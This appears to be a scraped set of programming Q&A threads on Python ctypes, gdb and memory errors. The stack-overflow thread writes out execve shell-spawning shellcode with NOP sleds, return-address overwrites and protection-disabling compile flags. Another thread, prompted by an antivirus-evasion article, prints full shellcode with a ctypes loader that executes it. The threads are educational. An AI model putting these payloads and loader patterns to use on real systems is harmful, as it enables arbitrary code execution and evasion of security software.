I'm trying to call inlined machine code from pure Python code on Linux. To this end, I embed the code in a bytes literal
code = b"\x55\x89\xe5\x5d\xc3"
and then call mprotect() via ctypes to allow execution of the page containing the code. Finally, I try to use ctypes to call the code. Here is my full code:
#!/usr/bin/python3
from ctypes import *
# Initialise ctypes prototype for mprotect().
# According to the manpage:
# int mprotect(const void *addr, size_t len, int prot);
libc = CDLL("libc.so.6")
mprotect = libc.mprotect
mprotect.restype = c_int
mprotect.argtypes = [c_void_p, c_size_t, c_int]
# PROT_xxxx constants
# Output of gcc -E -dM -x c /usr/include/sys/mman.h | grep PROT_
# #define PROT_NONE 0x0
# #define PROT_READ 0x1
# #define PROT_WRITE 0x2
# #define PROT_EXEC 0x4
# #define PROT_GROWSDOWN 0x01000000
# #define PROT_GROWSUP 0x02000000
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4
# Machine code of an empty C function, generated with gcc
# Disassembly:
# 55 push %ebp
# 89 e5 mov %esp,%ebp
# 5d pop %ebp
# c3 ret
code = b"\x55\x89\xe5\x5d\xc3"
# Get the address of the code
addr = addressof(c_char_p(code))
# Get the start of the page containing the code and set the permissions
pagesize = 0x1000
pagestart = addr & ~(pagesize - 1)
if mprotect(pagestart, pagesize, PROT_READ|PROT_WRITE|PROT_EXEC):
raise RuntimeError("Failed to set permissions using mprotect()")
# Generate ctypes function object from code
functype = CFUNCTYPE(None)
f = functype(addr)
# Call the function
print("Calling f()")
f()
This code segfaults on the last line.
Why do I get a segfault? The mprotect() call signals success, so I should be permitted to execute code in the page.
Is there a way to fix the code? Can I actually call the machine code in pure Python and inside the current process?
(Some further remarks: I'm not really trying to achieve a goal -- I'm trying to understand how things work. I also tried to use 2*pagesize instead of pagesize in the mprotect() call to rule out the case that my 5 bytes of code fall on a page boundary -- which should be impossible anyway. I used Python 3.1.3 for testing. My machine is an 32-bit i386 box. I know one possible solution would be to create a ELF shared object from pure Python code and load it via ctypes, but that's not the answer I'm looking for :)
Edit: The following C version of the code is working fine:
#include <sys/mman.h>
char code[] = "\x55\x89\xe5\x5d\xc3";
const int pagesize = 0x1000;
int main()
{
mprotect((int)code & ~(pagesize - 1), pagesize,
PROT_READ|PROT_WRITE|PROT_EXEC);
((void(*)())code)();
}
Edit 2: I found the error in my code. The line
addr = addressof(c_char_p(code))
first creates a ctypes char* pointing to the beginning of the bytes instance code. addressof() applied to this pointer does not return the address this pointer is pointing to, but rather the address of the pointer itself.
The simplest way I managed to figure out to actually get the address of the beginning of the code is
addr = addressof(cast(c_char_p(code), POINTER(c_char)).contents)
Hints for a simpler solution would be appreciated :)
Fixing this line makes the above code "work" (meaning it does nothing instead of segfaulting...).
I did a quick debug on this and it turns out the pointer to the code is
not being correctly constructed, and somewhere internally ctypes is munging
things up before passing the function pointer to ffi_call() which invokes the
code.
Here is the line in ffi_call_unix64() (I'm on 64-bit) where the function pointer is saved
into %r11:
57 movq %r8, %r11 /* Save a copy of the target fn.
When I execute your code, here is the value loaded into %r11 just before
it attempts the call:
(gdb) x/5b $r11
0x7ffff7f186d0: -108 24 -122 0 0
Here is the fix to construct the pointer and call the function:
raw = b"\x55\x89\xe5\x5d\xc3"
code = create_string_buffer(raw)
addr = addressof(code)
Now when I run it I see the correct bytes at that address, and the function
executes fine:
(gdb) x/5b $r11
0x7ffff7f186d0: 0x55 0x89 0xe5 0x5d 0xc3
You might have to flush the instruction cache.
It is unclear (to me, anyway) whether mprotect() automatically does this.
[update]
Of course, had I read the documentation for cacheflush(), I would have seen that it only applies on MIPS (according to the man page).
Assuming this is x86, you might have to invoke the WBINVD (or CLFLUSH) instruction.
In general, self-modifying code needs to flush the i-cache, but as far as I can tell there is no remotely portable way to do so.
I'd suggest you try to get your code working in C first, then translate to ctypes. There's also something like CorePy if you just want to be able to execute assembly from Python.
Related
I am having issues using ctypes to connect with a gaussmeter (F.W. Bell 5180). The manufacturer provides DLLs for the interface and a header file called FWB5180.h:
FWB5180.h:
// The following ifdef block is the standard way of creating macros which make exporting
// from a DLL simpler. All files within this DLL are compiled with the USB5100_EXPORTS
// symbol defined on the command line. this symbol should not be defined on any project
// that uses this DLL. This way any other project whose source files include this file see
// USB5100_API functions as being imported from a DLL, whereas this DLL sees symbols
// defined with this macro as being exported.
#ifdef USB5100_EXPORTS
#define USB5100_API __declspec(dllexport)
#else
#define USB5100_API __declspec(dllimport)
#endif
extern "C" USB5100_API unsigned int openUSB5100(void);
extern "C" USB5100_API void closeUSB5100(unsigned int fwb5000ID);
extern "C" USB5100_API int scpiCommand(unsigned int usbID, char* cmd, char* result, int len);
My ctypes Python code is the following, where all I try to do is initialize the device then close it:
import ctypes,time
# open DLL
path = "C:\\Users\\Roger\\fw_bell_magnetic_field_probe\\usb5100-x64\\x64-dist\\usb5100.dll"
fwbell = ctypes.WinDLL(path)
# define open and close functions with argument and return types
openUSB5100 = fwbell.openUSB5100
openUSB5100.argtypes = None
openUSB5100.restype = ctypes.c_int
closeUSB5100 = fwbell.closeUSB5100
closeUSB5100.argtypes = [ctypes.c_int]
closeUSB5100.restype = None
# open device
idn = openUSB5100()
print(idn, type(idn))
# close device
time.sleep(0.1)
closeUSB5100(idn)
Expected behavior: it says elsewhere in the documentation that idn is a four bit unsigned integer, so it should return a number like 10203045. So I would expect an idn like that, and no errors while closing the connection.
Actual behavior: In my code, openUSB5100 always returns 0, whether the device is plugged in or not. The print statement always outputs 0 <class 'int'>. Then, the closeUSB5100 function errors out with something like OSError: exception: access violation reading 0x0000000000000028. I have also tried using different types for idn like c_ulong, but that didn't seem to help.
I'm on Windows 10 using python 3.9. Both are 64-bit, as are the DLLs.
I will note that I can use the gaussmeter using their provided dummy programs so its not strictly a connectivity issue. Though, I think they are using a 32-bit application with 32 bit drivers because when I try to use the DLLs that they seem to use, I get the following error: OSError: [WinError 193] %1 is not a valid Win32 application. When I use the DLLs marked as 64 bit I don't get this error.
Any tips or things to try with my code? This is my first foray into ctypes, so I accept there is likely egregious errors.
EDIT:
Here is the exact error message that I am getting.
PS C:\Users\Roger\fw_bell_magnetic_field_probe\usb5100-x64\x64-dist> python .\fw_bell_py.py
Traceback (most recent call last):
File "C:\Users\Roger\fw_bell_magnetic_field_probe\usb5100-x64\x64-dist\fw_bell_py.py", line 30, in <module>
idn = openUSB5100()
OSError: exception: access violation reading 0x00000000B56B1D68
The last value, 0x ... , typically changes a little bit if I run the code more than once.
Additionally, I have discovered that apparently the gauss meter might be really slow at being ready to use after being detected by the PC. So if I wait a long time between plugging in the device (or monitoring with usb.core.list_devices until something shows up) and running this code, the code always errors out on the open command, it doesn't make it to the close command.
There were some issues with the code (see the discussion), but the larger problem is that there is some problem with the DLL files themselves.
I checked the core file because the process(c++ lang) running on Linux died, and the contents of the core file
[Corefile]
File "/usr/lib64/../share/gdb/python/libstdcxx/v6/printers.py", line 558, in to_string
return self.val['_M_dataplus']['_M_p'].lazy_string (length = len)
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
I think that there was a problem with class StdStringPrinter at printers.py.
So I looked up a text that explained the problem I was looking for on this site , modified printers.py, and created a .gdbinit on my home path and wrote the content.
How to enable gdb pretty printing for C++ STL objects in Eclipse CDT?
Eclipse/CDT Pretty Print Errors
But this method is a little different from the one I'm looking for because it's done in Eclipse.
my gdb version is 7.6.1-94.el7
[printer.py]
class StdStringPrinter:
"Print a std::basic_string of some kind"
def __init__(self, typename, val):
self.val = val
def to_string(self):
# Make sure &string works, too.
type = self.val.type
if type.code == gdb.TYPE_CODE_REF:
type = type.target ()
sys.stdout.write("HelloWorld") // TEST Code
# Calculate the length of the string so that to_string returns
# the string according to length, not according to first null
# encountered.
ptr = self.val ['_M_dataplus']['_M_p']
realtype = type.unqualified ().strip_typedefs ()
reptype = gdb.lookup_type (str (realtype) + '::_Rep').pointer ()
header = ptr.cast(reptype) - 1
len = header.dereference ()['_M_length']
if hasattr(ptr, "lazy_string"):
return ptr.lazy_string (length = len)
return ptr.string (length = len)
def display_hint (self):
return 'string'
[.gdbinit]
python
import sys
sys.path.insert(0, '/home/Hello/gcc-4.8.2/python')
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (None)
end
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
How can I print my modified TEST code at Linux Terminal?
I think that there was a problem with class StdStringPrinter at printers.py
I think you are fundamentally confused, and your problem has nothing at all to do with printers.py.
You didn't show us your GDB session, but it appears that you have tried to print some variable of type std::string, and when you did so, GDB produced this error:
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
What this error means is that GDB could not read value from memory location 0x3b444e45203b290f. On an x86_64 system, such a location indeed can not be readable, because that address does not have canonical form.
Conclusion: the pointer that you followed (likely a pointer to std::string in your program) does not actually point to std::string. "Fixing" the printers.py is not going to solve that problem.
This conclusion is corroborated by
the process(c++ lang) running on Linux died,
Finally, the pointer that you gave GDB to print: 0x3b444e45203b290f looks suspiciously like an ASCII string. Decoding it, we have: \xf); END;. So it's very likely that your program scribbled ); END; over a location where the pointer was supposed to be, and that you have a buffer overflow of some sort.
P.S.
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
This question also shows fundamental misunderstanding of how printers.py works. It has nothing to do with your program (it's loaded into GDB).
Recompiling anything (either your program or GDB) is not required. Simply restarting GDB should be all that's neccessary for it to pick up the new version of printers.py (not that that would fix anything).
So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.
I was reading the article Tips for Evading Anti-Virus During Pen Testing and was surprised by given Python program:
from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00....'
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
The shellcode is shortened. Can someone explain what is going on? I'm familiar with both Python and C, I've tried read on the ctypes module, but there are two main questions left:
What is stored in shellcode?
I know this has something to do with C (in the article it is an shellcode from Metasploit and a different notation for ASCII was chosen), but I cannot identify whether if it's C source (probably not) or originates from some sort of compilation (which?).
Depending on the first question, what's the magic happening during the cast?
Have a look at this shellcode, I toke it from here (it pops up a MessageBoxA):
#include <stdio.h>
typedef void (* function_t)(void);
unsigned char shellcode[] =
"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0";
void real_function(void) {
puts("I'm here");
}
int main(int argc, char **argv)
{
function_t function = (function_t) &shellcode[0];
real_function();
function();
return 0;
}
Compile it an hook it under any debugger, I'll use gdb:
> gcc shellcode.c -o shellcode
> gdb -q shellcode.exe
Reading symbols from shellcode.exe...done.
(gdb)
>
Disassemble the main function to see that different between calling real_function and function:
(gdb) disassemble main
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function> ; <- here we call our `real_function`
0x004013bb <+27>: mov 0xc(%esp),%eax
0x004013bf <+31>: call *%eax ; <- here we call the address that is loaded in eax (the address of the beginning of our shellcode)
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
There are two call, let's make a break point at <main+31> to see what is loaded in eax:
(gdb) break *(main+31)
Breakpoint 1 at 0x4013bf
(gdb) run
Starting program: shellcode.exe
[New Thread 2856.0xb24]
I'm here
Breakpoint 1, 0x004013bf in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function>
0x004013bb <+27>: mov 0xc(%esp),%eax
=> 0x004013bf <+31>: call *%eax ; now we are here
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
Look at the first 3 bytes of the data that the address in eax continues:
(gdb) x/3x $eax
0x402000 <shellcode>: 0xfc 0x33 0xd2
(gdb) ^-------^--------^---- the first 3 bytes of the shellcode
So the CPU will call 0x402000, the beginning of our shell code at 0x402000, lets disassemble what ever at 0x402000:
(gdb) disassemble 0x402000
Dump of assembler code for function shellcode:
0x00402000 <+0>: cld
0x00402001 <+1>: xor %edx,%edx
0x00402003 <+3>: mov $0x30,%dl
0x00402005 <+5>: pushl %fs:(%edx)
0x00402008 <+8>: pop %edx
0x00402009 <+9>: mov 0xc(%edx),%edx
0x0040200c <+12>: mov 0x14(%edx),%edx
0x0040200f <+15>: mov 0x28(%edx),%esi
0x00402012 <+18>: xor %ecx,%ecx
0x00402014 <+20>: mov $0x18,%cl
0x00402016 <+22>: xor %edi,%edi
0x00402018 <+24>: xor %eax,%eax
0x0040201a <+26>: lods %ds:(%esi),%al
0x0040201b <+27>: cmp $0x61,%al
0x0040201d <+29>: jl 0x402021 <shellcode+33>
....
As you see, a shellcode is nothing more than assembly instructions, the only different is in the way you write these instructions, it uses special techniques to make it more portable, for example never use a fixed address.
The python equivalent to the above program:
#!python
from ctypes import *
shellcode_data = "\
\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B\
\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9\
\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C\
\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0\
\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\
\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72\
\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03\
\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\
\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\
\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\
\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66\
\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14\
\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72\
\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\
\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01\
\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65\
\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B\
\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42\
\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24\
\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57\
\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01\
\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F\
\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24\
\x40\xFF\x54\x24\x40\x57\xFF\xD0"
shellcode = c_char_p(shellcode_data)
function = cast(shellcode, CFUNCTYPE(None))
function()
shellcode , if I'm not mistaken, contains architecture-specific compiled code that roughly translates as a function call. (not an architecture expert, and the code is truncated...)
Therefore, once you've created a C-style string with create_string_buffer, you can then fool python into thinking that it is a function with the cast call. Python then executes the code originally contained in shellcode.
There's a helpful link here: http://www.blackhatlibrary.net/Python#Ctypes
Let us not forget that in order to have executable code, it has to be converted to a format that your machine understands. What you are doing there is providing a sequence of byte codes that can be interpreted by your machine, so you can tell your machine to execute it. You are effectively skipping the job of a compiler by providing the final byte codes; this technique is common in Just-In-Time compilers which have to create executable code while the program is running.
So, this actually have little to none relation to C (or Python, or any other language), but has a huge relation to the details of the architecture this code is expected to run at.
The first byte code there is CLD (0xfc) followed by a CALL instruction (0xe8) which makes the code jump to the address based on the offset specified in the next 4 bytes in this bytecode sequence, and so on.
I am trying to access elements of a structure from ctypes. The structure is created in an init function in the C code and pointer to it is returned to Python. The problem I am having is that I get a segfault when trying to access elements of the returned structure. Here is the code:
The C code (which I've called ctypes_struct_test.c):
#include <stdio.h>
#include <stdbool.h>
typedef struct {
bool flag;
} simple_structure;
simple_structure * init()
{
static simple_structure test_struct = {.flag = true};
if (test_struct.flag) {
printf("flag is set in C\n");
}
return &test_struct;
}
The Python code (which I've called ctypes_struct_test.py):
#!/usr/bin/env python
import ctypes
import os
class SimpleStructure(ctypes.Structure):
_fields_ = [('flag', ctypes.c_bool)]
class CtypesWrapperClass(object):
def __init__(self):
cwd = os.path.dirname(os.path.abspath(__file__))
library_file = os.path.join(cwd,'libctypes_struct_test.so')
self._c_ctypes_test = ctypes.CDLL(library_file)
self._c_ctypes_test.init.restypes = ctypes.POINTER(SimpleStructure)
self._c_ctypes_test.init.argtypes = []
self.simple_structure = ctypes.cast(\
self._c_ctypes_test.init(),\
ctypes.POINTER(SimpleStructure))
a = CtypesWrapperClass()
print 'Python initialised fine'
print a.simple_structure.contents
print a.simple_structure.contents.flag
The C is compiled under Linux as follows:
gcc -o ctypes_struct_test.os -c --std=c99 -fPIC ctypes_struct_test.c
gcc -o libctypes_struct_test.so -shared ctypes_struct_test.os
On running python ctypes_struct_test.py, I get the following output:
flag is set in C
Python initialised fine
<__main__.SimpleStructure object at 0x166c680>
Segmentation fault
Is there some problem with what I am trying to do, or the way I am trying to do it?
To make this work, replace the wrong line
self._c_ctypes_test.init.restypes = ctypes.POINTER(SimpleStructure)
by the correct line
self._c_ctypes_test.init.restype = ctypes.POINTER(SimpleStructure)
Also consider to remove the pointless cast
self.simple_structure = ctypes.cast(
self._c_ctypes_test.init(), ctypes.POINTER(SimpleStructure))
It's casting from ctypes.POINTER(SimpleStructure) to ctypes.POINTER(SimpleStructure)!
You declare test_struct as a static local variable inside your init routine -- I'm suspicious of that at first blush. (Bear with me; my C is a bit rusty.)
Static local variables in C are supposed to persist across multiple calls to the same function, but their scope is the same as an automatic local variable -- and returning a pointer to an automatic local variable would certainly give you a segfault. Even if this would ordinarily work if you were calling that function from the same translation unit in C, the fact that you're calling it from Python (and that you're segfaulting as soon as you try to access the struct) is a red flag.
Instead of returning a pointer to a static variable, try using malloc() in your init routine and returning the pointer you get from that.
[[[ WARNING: this will result in a memory leak. ]]]
But that's OK; if the segfault goes away, you'll know that that was the problem. Then you can fix the memory leak by providing a second routine in your C code that calls free(), and making sure you invoke it from your python code when you're done with the struct.